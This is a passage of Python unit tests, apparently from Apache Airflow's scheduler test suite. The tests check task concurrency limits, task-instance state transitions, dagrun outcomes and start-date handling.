    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
    task2 = DummyOperator(dag=dag, task_id=task_id_2)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)
    # Nothing running yet: both scheduled TIs are executable.
    ti1_1 = TI(task1, dr1.execution_date)
    ti2 = TI(task2, dr1.execution_date)
    ti1_1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti2)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(2, len(res))
    # One instance of task1 running: one task_concurrency slot remains.
    ti1_1.state = State.RUNNING
    ti2.state = State.RUNNING
    ti1_2 = TI(task1, dr2.execution_date)
    ti1_2.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti2)
    session.merge(ti1_2)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(1, len(res))
    # Two instances of task1 running: its limit of 2 is exhausted.
    ti1_2.state = State.RUNNING
    ti1_3 = TI(task1, dr3.execution_date)
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(0, len(res))
    # All three scheduled again: only 2 fit under task_concurrency.
    ti1_1.state = State.SCHEDULED
    ti1_2.state = State.SCHEDULED
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(2, len(res))
    # One running plus two scheduled: a single slot remains.
    ti1_1.state = State.RUNNING
    ti1_2.state = State.SCHEDULED
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
    """An empty task-instance list comes back empty."""
    scheduler = SchedulerJob()
    session = settings.Session()
    result = scheduler._change_state_for_executable_task_instances(
        [], [State.NONE], session)
    self.assertEqual(0, len(result))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
    """Nothing is returned when no TI is in one of the acceptable states."""
    dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task1, dr2.execution_date)
    ti3 = TI(task1, dr3.execution_date)
    ti1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED
    ti3.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)
    session.commit()
    # All TIs are SCHEDULED but only RUNNING is acceptable here.
    res = scheduler._change_state_for_executable_task_instances(
        [ti1, ti2, ti3],
        [State.RUNNING],
        session)
    self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
    """TIs in NONE or SCHEDULED are moved to QUEUED; others are skipped."""
    dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task1, dr2.execution_date)
    ti3 = TI(task1, dr3.execution_date)
    ti1.state = State.SCHEDULED
    ti2.state = State.QUEUED
    ti3.state = State.NONE
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)
    session.commit()
    # ti2 is QUEUED and therefore not in the acceptable-state list.
    res = scheduler._change_state_for_executable_task_instances(
        [ti1, ti2, ti3],
        [State.NONE, State.SCHEDULED],
        session)
    self.assertEqual(2, len(res))
    ti1.refresh_from_db()
    ti3.refresh_from_db()
    self.assertEqual(State.QUEUED, ti1.state)
    self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
    """Queued TIs must be handed to the executor via queue_command."""
    dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    session.merge(ti1)
    session.commit()
    # The executor must have been asked to run the queued TI.
    with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
        scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
        mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
    """An empty SimpleDagBag means nothing can be queued."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = SimpleDagBag([])
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti1.state = State.SCHEDULED
    session.merge(ti1)
    session.commit()
    # The TI's dag is not in the (empty) dag bag, so nothing is executed.
    self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
    """End-to-end: _execute_task_instances respects dag-level concurrency
    across multiple dag runs of the same dag."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances'
    task_id_1 = 'dummy_task'
    task_id_2 = 'dummy_task_nonexistent_queue'
    # important that len(tasks) is less than concurrency
    # because before scheduler._execute_task_instances would only
    # check the num tasks once so if concurrency was 3,
    # we could execute arbitrarily many tasks in the second run
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    task2 = DummyOperator(dag=dag, task_id=task_id_2)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    # create first dag run with 1 running and 1 queued
    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task2, dr1.execution_date)
    ti1.refresh_from_db()
    ti2.refresh_from_db()
    ti1.state = State.RUNNING
    ti2.state = State.RUNNING
    session.merge(ti1)
    session.merge(ti2)
    session.commit()
    self.assertEqual(State.RUNNING, dr1.state)
    self.assertEqual(
        2,
        DAG.get_num_task_instances(
            dag_id, dag.task_ids, states=[State.RUNNING], session=session
        )
    )
    # create second dag run
    dr2 = scheduler.create_dag_run(dag)
    ti3 = TI(task1, dr2.execution_date)
    ti4 = TI(task2, dr2.execution_date)
    ti3.refresh_from_db()
    ti4.refresh_from_db()
    # manually set to scheduled so we can pick them up
    ti3.state = State.SCHEDULED
    ti4.state = State.SCHEDULED
    session.merge(ti3)
    session.merge(ti4)
    session.commit()
    self.assertEqual(State.RUNNING, dr2.state)
    res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    # check that concurrency is respected
    ti1.refresh_from_db()
    ti2.refresh_from_db()
    ti3.refresh_from_db()
    ti4.refresh_from_db()
    self.assertEqual(
        3,
        DAG.get_num_task_instances(
            dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
        )
    )
    self.assertEqual(State.RUNNING, ti1.state)
    self.assertEqual(State.RUNNING, ti2.state)
    # only one of the two scheduled TIs fits under concurrency=3
    six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
    self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
    """All 8 SCHEDULED TIs must be queued even though max_tis_per_query=3,
    i.e. _execute_task_instances keeps querying until the backlog is drained.
    """
    dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
    task_id_1 = 'dummy_task'
    task_id_2 = 'dummy_task_2'
    # important that len(tasks) is less than concurrency
    # because before scheduler._execute_task_instances would only
    # check the num tasks once so if concurrency was 3,
    # we could execute arbitrarily many tasks in the second run
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    task2 = DummyOperator(dag=dag, task_id=task_id_2)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    # force several query round-trips: 8 TIs / 3 per query
    scheduler.max_tis_per_query = 3
    session = settings.Session()
    tis = []
    for i in range(0, 4):
        dr = scheduler.create_dag_run(dag)
        ti1 = TI(task1, dr.execution_date)
        ti2 = TI(task2, dr.execution_date)
        tis.append(ti1)
        tis.append(ti2)
        ti1.refresh_from_db()
        ti2.refresh_from_db()
        ti1.state = State.SCHEDULED
        ti2.state = State.SCHEDULED
        session.merge(ti1)
        session.merge(ti2)
    session.commit()
    res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    self.assertEqual(8, res)
    for ti in tis:
        ti.refresh_from_db()
        self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
                     "The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
    """_change_state_for_tis_without_dagrun must only reset TIs whose dagrun
    is missing (ti3) or not RUNNING (dr1 after being FAILED); TIs attached to
    a healthy RUNNING dagrun, or already finished, are left untouched.
    """
    dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
    DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
    DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
    dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
    DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
    dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
    DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
    session = settings.Session()
    dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
                             state=State.RUNNING,
                             execution_date=DEFAULT_DATE,
                             start_date=DEFAULT_DATE,
                             session=session)
    dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
                             state=State.RUNNING,
                             execution_date=DEFAULT_DATE,
                             start_date=DEFAULT_DATE,
                             session=session)
    ti1a = dr1.get_task_instance(task_id='dummy', session=session)
    ti1a.state = State.SCHEDULED
    ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
    ti1b.state = State.SUCCESS
    session.commit()
    ti2 = dr2.get_task_instance(task_id='dummy', session=session)
    ti2.state = State.SCHEDULED
    session.commit()
    # ti3 deliberately has no dagrun at all
    ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
    ti3.state = State.SCHEDULED
    session.merge(ti3)
    session.commit()
    dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
    scheduler = SchedulerJob(num_runs=0)
    scheduler._change_state_for_tis_without_dagrun(
        simple_dag_bag=dagbag,
        old_states=[State.SCHEDULED, State.QUEUED],
        new_state=State.NONE,
        session=session)
    ti1a = dr1.get_task_instance(task_id='dummy', session=session)
    ti1a.refresh_from_db(session=session)
    self.assertEqual(ti1a.state, State.SCHEDULED)
    ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
    ti1b.refresh_from_db(session=session)
    self.assertEqual(ti1b.state, State.SUCCESS)
    ti2 = dr2.get_task_instance(task_id='dummy', session=session)
    ti2.refresh_from_db(session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
    # only the dagrun-less TI was reset
    ti3.refresh_from_db(session=session)
    self.assertEqual(ti3.state, State.NONE)
    dr1.refresh_from_db(session=session)
    dr1.state = State.FAILED
    # why o why
    session.merge(dr1)
    session.commit()
    scheduler._change_state_for_tis_without_dagrun(
        simple_dag_bag=dagbag,
        old_states=[State.SCHEDULED, State.QUEUED],
        new_state=State.NONE,
        session=session)
    ti1a.refresh_from_db(session=session)
    self.assertEqual(ti1a.state, State.SCHEDULED)
    # don't touch ti1b
    ti1b.refresh_from_db(session=session)
    self.assertEqual(ti1b.state, State.SUCCESS)
    # don't touch ti2
    ti2.refresh_from_db(session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
    """QUEUED tasks left over in executor.queued_tasks must be reset to
    SCHEDULED; tasks in any other state (e.g. RUNNING) must not be touched.
    """
    dag = DAG(
        dag_id='dag_id',
        start_date=DEFAULT_DATE)
    task = DummyOperator(
        task_id='task_id',
        dag=dag,
        owner='airflow')
    # If there's no left over task in executor.queued_tasks, nothing happens
    session = settings.Session()
    scheduler_job = SchedulerJob()
    mock_logger = mock.MagicMock()
    test_executor = TestExecutor()
    scheduler_job.executor = test_executor
    scheduler_job._logger = mock_logger
    scheduler_job._change_state_for_tasks_failed_to_execute()
    mock_logger.info.assert_not_called()
    # Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
    session.query(TI).delete()
    session.commit()
    # key mirrors the executor's (dag_id, task_id, execution_date, try_number) key
    key = 'dag_id', 'task_id', DEFAULT_DATE, 1
    test_executor.queued_tasks[key] = 'value'
    ti = TI(task, DEFAULT_DATE)
    ti.state = State.QUEUED
    session.merge(ti)
    session.commit()
    scheduler_job._change_state_for_tasks_failed_to_execute()
    ti.refresh_from_db()
    self.assertEqual(State.SCHEDULED, ti.state)
    # Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
    session.query(TI).delete()
    session.commit()
    ti.state = State.RUNNING
    session.merge(ti)
    session.commit()
    scheduler_job._change_state_for_tasks_failed_to_execute()
    ti.refresh_from_db()
    self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
    """_execute_helper must reset orphaned SCHEDULED TIs of scheduler-owned
    dagruns to NONE, but leave backfill dagrun TIs alone.
    """
    session = settings.Session()
    dag = DAG(
        'test_execute_helper_reset_orphaned_tasks',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'})
    with dag:
        op1 = DummyOperator(task_id='op1')
    dag.clear()
    # dr: a scheduler-created run; dr2: a backfill run (different run_id prefix)
    dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE,
                           session=session)
    dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
                            state=State.RUNNING,
                            execution_date=DEFAULT_DATE + datetime.timedelta(1),
                            start_date=DEFAULT_DATE,
                            session=session)
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    ti.state = State.SCHEDULED
    ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
    ti2.state = State.SCHEDULED
    session.commit()
    processor = mock.MagicMock()
    scheduler = SchedulerJob(num_runs=0)
    executor = TestExecutor()
    scheduler.executor = executor
    scheduler.processor_agent = processor
    scheduler._execute_helper()
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    self.assertEqual(ti.state, State.NONE)
    ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
    [State.UP_FOR_RETRY, State.FAILED],
    [State.QUEUED, State.NONE],
    [State.SCHEDULED, State.NONE],
    [State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
        self, initial_task_state, expected_task_state):
    """A TI attached to a FAILED dagrun must be moved from
    *initial_task_state* to *expected_task_state* by one pass of
    _execute_helper.
    """
    session = settings.Session()
    dag = DAG(
        'test_execute_helper_should_change_state_for_tis_without_dagrun',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'})
    with dag:
        op1 = DummyOperator(task_id='op1')
    # Create DAG run with FAILED state
    dag.clear()
    dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
                           state=State.FAILED,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE,
                           session=session)
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    ti.state = initial_task_state
    session.commit()
    # Create scheduler and mock calls to processor. Run duration is set
    # to a high value to ensure loop is entered. Poll interval is 0 to
    # avoid sleep. Done flag is set to true to exit the loop immediately.
    scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
    executor = TestExecutor()
    scheduler.executor = executor
    processor = mock.MagicMock()
    processor.harvest_simple_dags.return_value = [dag]
    processor.done = True
    scheduler.processor_agent = processor
    scheduler._execute_helper()
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
        self,
        dag_id,
        expected_task_states,  # dict of task_id: state
        dagrun_state,
        run_kwargs=None,
        advance_execution_date=False,
        session=None):
    """
    Helper for testing DagRun states with simple two-task DAGS.
    This is hackish: a dag run is created but its tasks are
    run by a backfill.

    :param dag_id: dag to load from self.dagbag
    :param expected_task_states: dict of task_id -> expected TI state
    :param dagrun_state: expected final DagRun state
    :param run_kwargs: extra kwargs forwarded to dag.run()
    :param advance_execution_date: create a second dagrun and evaluate that
        one instead (its execution_date is after the start_date)
    :param session: injected by @provide_session
    """
    if run_kwargs is None:
        run_kwargs = {}
    scheduler = SchedulerJob()
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    if advance_execution_date:
        # run a second time to schedule a dagrun after the start_date
        dr = scheduler.create_dag_run(dag)
    ex_date = dr.execution_date
    try:
        dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
    except AirflowException:
        # a failing task raises; the states are asserted below regardless
        pass
    # test tasks
    for task_id, expected_state in expected_task_states.items():
        task = dag.get_task(task_id)
        ti = TI(task, ex_date)
        ti.refresh_from_db()
        self.assertEqual(ti.state, expected_state)
    # load dagrun
    dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
    dr = dr[0]
    dr.dag = dag
    self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
    """
    DagRuns with one failed and one incomplete root task -> FAILED
    """
    states = {
        'test_dagrun_fail': State.FAILED,
        'test_dagrun_succeed': State.UPSTREAM_FAILED,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_fail',
        expected_task_states=states,
        dagrun_state=State.FAILED)
def test_dagrun_success(self):
    """
    DagRuns with one failed and one successful root task -> SUCCESS
    """
    states = {
        'test_dagrun_fail': State.FAILED,
        'test_dagrun_succeed': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_success',
        expected_task_states=states,
        dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
    """
    DagRuns with one successful and one failed root task -> FAILED
    """
    states = {
        'test_dagrun_succeed': State.SUCCESS,
        'test_dagrun_fail': State.FAILED,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_root_fail',
        expected_task_states=states,
        dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
    """
    DagRuns with one unfinished and one failed root task -> RUNNING
    """
    # Run both the failed and successful tasks
    scheduler = SchedulerJob()
    dag_id = 'test_dagrun_states_root_fail_unfinished'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    try:
        dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
    except AirflowException:  # Expect an exception since there is a failed task
        pass
    # Mark the successful task as never having run since we want to see if the
    # dagrun will be in a running state despite having an unfinished task.
    with create_session() as session:
        ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
        ti.state = State.NONE
        session.commit()
    dr_state = dr.update_state()
    self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
    """
    DagRun is marked a success if ignore_first_depends_on_past=True

    Test that an otherwise-deadlocked dagrun is marked as a success
    if ignore_first_depends_on_past=True and the dagrun execution_date
    is after the start_date.
    """
    states = {
        'test_depends_on_past': State.SUCCESS,
        'test_depends_on_past_2': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_deadlock',
        expected_task_states=states,
        dagrun_state=State.SUCCESS,
        advance_execution_date=True,
        run_kwargs={'ignore_first_depends_on_past': True})
def test_dagrun_deadlock_ignore_depends_on_past(self):
    """
    Test that ignore_first_depends_on_past doesn't affect results
    (this is the same test as
    test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
    that start_date == execution_date so depends_on_past is irrelevant).
    """
    states = {
        'test_depends_on_past': State.SUCCESS,
        'test_depends_on_past_2': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_deadlock',
        expected_task_states=states,
        dagrun_state=State.SUCCESS,
        run_kwargs={'ignore_first_depends_on_past': True})
def test_scheduler_start_date(self):
    """
    Test that the scheduler respects start_dates, even when DAGS have run
    """
    with create_session() as session:
        dag_id = 'test_start_date_scheduling'
        dag = self.dagbag.get_dag(dag_id)
        dag.clear()
        # the DAG's start_date is in the future, so nothing should be scheduled
        self.assertTrue(dag.start_date > datetime.datetime.utcnow())
        scheduler = SchedulerJob(dag_id,
                                 subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
                                 num_runs=1)
        scheduler.run()
        # zero tasks ran
        self.assertEqual(
            len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
        session.commit()
        # previously, running this backfill would kick off the Scheduler
        # because it would take the most recent run and start from there
        # That behavior still exists, but now it will only do so if after the
        # start date
        backfill = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE)
        backfill.run()
        # one task ran
        self.assertEqual(
            len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
        session.commit()
        scheduler = SchedulerJob(dag_id,
                                 subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
                                 num_runs=1)
        scheduler.run()
        # still one task
        self.assertEqual(
            len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
        session.commit()
def test_scheduler_task_start_date(self):
    """
    Test that the scheduler respects task start dates that are different
    from DAG start dates
    """
    dag_id = 'test_task_start_date_scheduling'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    scheduler = SchedulerJob(dag_id,
                             subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
                             num_runs=2)
    scheduler.run()
    session = settings.Session()
    tiq = session.query(TI).filter(TI.dag_id == dag_id)
    ti1s = tiq.filter(TI.task_id == 'dummy1').all()
    ti2s = tiq.filter(TI.task_id == 'dummy2').all()
    # dummy1's start_date is still in the future -> never scheduled;
    # dummy2 ran in both scheduler loops
    self.assertEqual(len(ti1s), 0)
    self.assertEqual(len(ti2s), 2)
    for t in ti2s:
        self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
    """
    Test that the scheduler can successfully queue multiple dags in parallel
    """
    dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
    for dag_id in dag_ids:
        dag = self.dagbag.get_dag(dag_id)
        dag.clear()
    scheduler = SchedulerJob(dag_ids=dag_ids,
                             subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
                             num_runs=1)
    scheduler.run()
    # zero tasks ran: test_start_date_scheduling has a future start_date
    dag_id = 'test_start_date_scheduling'
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
    """
    Test if the scheduler does not create multiple dagruns
    if a dag is scheduled with @once and a start_date
    """
    dag = DAG(
        'test_scheduler_dagrun_once',
        start_date=timezone.datetime(2015, 1, 1),
        schedule_interval="@once")
    scheduler = SchedulerJob()
    dag.clear()
    # first call creates the single @once run ...
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # ... and a second call must not create another
    dr = scheduler.create_dag_run(dag)
    self.assertIsNone(dr)
@parameterized.expand([
    [State.NONE, None, None],
    [State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
     timezone.utcnow() - datetime.timedelta(minutes=15)],
    [State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
     timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
    """
    Test if _process_task_instances puts the right task instances into the
    queue.
    """
    dag = DAG(
        dag_id='test_scheduler_process_execute_task',
        start_date=DEFAULT_DATE)
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    with create_session() as session:
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    with create_session() as session:
        tis = dr.get_task_instances(session=session)
        # parameterized TI state/dates: all of these must still be picked up
        for ti in tis:
            ti.state = state
            ti.start_date = start_date
            ti.end_date = end_date
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    # _process_task_instances enqueues TI keys via queue.append
    queue.append.assert_called_with(
        (dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
    )
def test_scheduler_do_not_schedule_removed_task(self):
    """A task removed from the DAG after its dagrun was created must not be
    scheduled by _process_task_instances.
    """
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_removed_task',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # re-create the DAG without the task to simulate its removal
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_removed_task',
        start_date=DEFAULT_DATE)
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    # BUG FIX: _process_task_instances enqueues via queue.append (see the
    # positive assertions in the sibling tests); asserting that queue.put
    # was never called is vacuously true on a Mock.
    queue.append.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
    """A DAG whose start_date is in the far future must get neither a dagrun
    nor any queued task instances.
    """
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_too_early',
        start_date=timezone.datetime(2200, 1, 1))
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNone(dr)
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    # BUG FIX: assert on queue.append — the method used by
    # _process_task_instances — instead of the never-used queue.put,
    # which made the original assertion vacuous.
    queue.append.assert_not_called()
def test_scheduler_do_not_run_finished(self):
    """Task instances already in SUCCESS state must not be queued again."""
    dag = DAG(
        dag_id='test_scheduler_do_not_run_finished',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # mark every TI of the run as finished
    tis = dr.get_task_instances(session=session)
    for ti in tis:
        ti.state = State.SUCCESS
    session.commit()
    session.close()
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    # BUG FIX: assert on queue.append — the method used by
    # _process_task_instances — instead of the never-used queue.put,
    # which made the original assertion vacuous.
    queue.append.assert_not_called()
def test_scheduler_add_new_task(self):
    """
    Test if a task instance will be added if the dag is updated
    """
    dag = DAG(
        dag_id='test_scheduler_add_new_task',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    tis = dr.get_task_instances()
    self.assertEqual(len(tis), 1)
    # add a second task after the dagrun was created
    DummyOperator(
        task_id='dummy2',
        dag=dag,
        owner='airflow')
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    # the new task must have been materialized as a TI on the existing run
    tis = dr.get_task_instances()
    self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
    """
    Test if a dagrun will not be scheduled if max_dag_runs has been reached
    """
    dag = DAG(
        dag_id='test_scheduler_verify_max_active_runs',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 1
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
